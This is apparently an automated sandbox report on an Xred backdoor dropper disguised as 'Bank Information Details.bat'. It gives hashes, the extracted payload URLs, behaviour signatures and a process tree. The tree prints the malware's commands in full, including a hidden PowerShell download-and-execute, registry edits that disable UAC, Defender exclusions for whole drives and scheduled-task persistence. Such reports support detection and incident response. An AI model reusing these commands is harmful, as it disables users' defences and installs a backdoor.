Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
07-11-2024 05:45
General
-
Target
Bank Information Details.bat
-
Size
41KB
-
MD5
a2539089ecc2f92f81908c88ab2b2938
-
SHA1
9a18b58b8fc22ec070434020c537f4bfa5c57973
-
SHA256
155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9
-
SHA512
07a1a04a25c9063e8ba14b516b768906b115ae21d1133f01f8f4b7674e512bd876a5109d26aa1d78d91cbf3e7c9c730d6921f6cd95ab0ff5a5f58331a17dad40
-
SSDEEP
768:OfxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1KcTtb2w80P+RTXH7hhb:qxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1Kx
Malware Config
Extracted
https://paste.fo/raw/024749876411
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Xred
Xred is backdoor written in Delphi.
-
Xred family
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Using powershell.exe command.
-
Suspicious Office macro 1 IoCs
Office document equipped with macros.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
AutoIT Executable 14 IoCs
AutoIT scripts compiled to PE executables.
-
UPX packed file 17 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 12 IoCs
-
Modifies registry class 2 IoCs
-
Modifies registry key 1 TTPs 12 IoCs
-
NTFS ADS 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/024749876411', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/wada123wada/shsfdhdgh/refs/heads/main/NOTICE.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffa35646f8,0x7fffa3564708,0x7fffa35647184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5172 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1992,2536255424126243620,7000566497213349900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\NOTICE.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\NOTICE.exe"C:\Users\Admin\AppData\Local\Temp\Startup\NOTICE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\._cache_NOTICE.exe"C:\Users\Admin\AppData\Local\Temp\._cache_NOTICE.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn JTFFUA.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Adobe Reader 9.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn JTFFUA.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Adobe Reader 9.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\JTFFUA.vbs5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD57de1bbdc1f9cf1a58ae1de4951ce8cb9
SHA1010da169e15457c25bd80ef02d76a940c1210301
SHA2566e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e
SHA512e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c
-
Filesize
152B
MD585ba073d7015b6ce7da19235a275f6da
SHA1a23c8c2125e45a0788bac14423ae1f3eab92cf00
SHA2565ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617
SHA512eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3
-
Filesize
5KB
MD5351e4f7b26fb087c2c23e8776ceec14f
SHA11cd9693a5948a706f5552e9bbc83b38b4b818f47
SHA256597602cd64da2e7eb4ab4657d98d765419d7d444a7dfbfd3aae9658f67ff4ede
SHA512cdb324ea4e869fceabd7b27c793841c612cfb00258aae759ffffe1c37d037da1460bd98aca592691ad7cceef8f18693f2be48b2c2fd2b1d831fbc83f86b9465d
-
Filesize
6KB
MD563123b12193b86309889c37b86180be9
SHA1309418ce066b92d4bb38e944ef35fcf6d260bb3d
SHA25607868bbdb948ed16cc5b8981acf53d63606f8e00f902651476da82dce6f6cc94
SHA512b04528fcee1a4eea3b575f7f40f3c00dfbb6bd0dd1ccb4759f138c139cbccd9be10802390aef1bb7fb34fceeb78a1d55b09c9239ec33e79a923be8856a4135e7
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
11KB
MD51786a364dd33c2b56d37a0b1fad78cb3
SHA1a98f17b532b4b47ed90b88249b0b26e3f2557d12
SHA256a3e2a64a8c4c0ad646c500324873eeffab255df38894e1ef2157150ab1168295
SHA5126f958836f8ce794bdb13431593c6f73f80eae75b7826f1fe92e37e821193994dec3d16c916d6b5820f32cac7254e27fcd17834b83c235845f0d37e2de54731bb
-
Filesize
4KB
MD51261402c5295949dcb0c1f88b57398ea
SHA1bb7ee7842dd9d5bcd6e55cff16e0e388ec038b24
SHA2566f60fa9635e991b7d41d1903c354c13dff8672d51907f2d0542b9f07dcdaa285
SHA51223dfb39acb391317bd4ae4b89bb0cd91738651dd249fe906e7cbd950cb18bc83df155215f3804efa1b59ee2e6c7954571ac555459cc51ce23fbab8510e809dc3
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
1KB
MD5612b19feac3b60bdc771ec888769ea75
SHA1cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb
SHA2563eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1
SHA5122f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af
-
Filesize
1KB
MD5bb399bb581675c7a4ea8e6d1b684ea93
SHA13b3b187d6d27ba0cf0767296b1d4c442cd121dce
SHA2566f8ac41385bb99c3fcba58c015a4c2a6c096d0b6a25bbea4dd7375c3e2b64e83
SHA512dafecabbcb9205438f2ef3d8b0d772e47e228921ee00ee07521847c380b47ed31897b85f383eab76b82fe72098f79e73f6fb5877ac5e775b2b40e8387fca98d3
-
Filesize
944B
MD5692a440f9cfbeaf648632aead685a5a1
SHA1e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA2563e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519
-
Filesize
944B
MD53072fa0040b347c3941144486bf30c6f
SHA1e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA51262df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c
-
Filesize
906KB
MD566d2c639cb94ffb0324ca020c3aa4c77
SHA1929e912f64ea70c7193cd3dadf4ba6ebe22410bd
SHA256cccec4291b70f56acdd74458d4ea99fe1105d78566ff7f4adf17c0a2f72b4577
SHA512a09c54e8908902e26bc2f4e8195a049ac6a3c90f1ce8e97351518e7ff3418bfd3daf960d8f6d26ca56c21af3594d768b36151c923b1de166dce31f1a49c6ac3c
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
21KB
MD59a89c4a32fad0fc375b1bb6510421eb1
SHA18f1bacc6e9a1ee63baf7ddc6f7b096550b4ddbfc
SHA256dccbf84ffa4b5f47fbdbc3621a5277adf3978bee27ab4ed4c8549ae18fb70eba
SHA512e450d0a1e44e958abff3c92d9b9ae322b659541d22f563a46e91569506e8da49623c96eebb5258ecd552fd125950392551bfe7a332e351b258df3f05e2af8173
-
Filesize
17KB
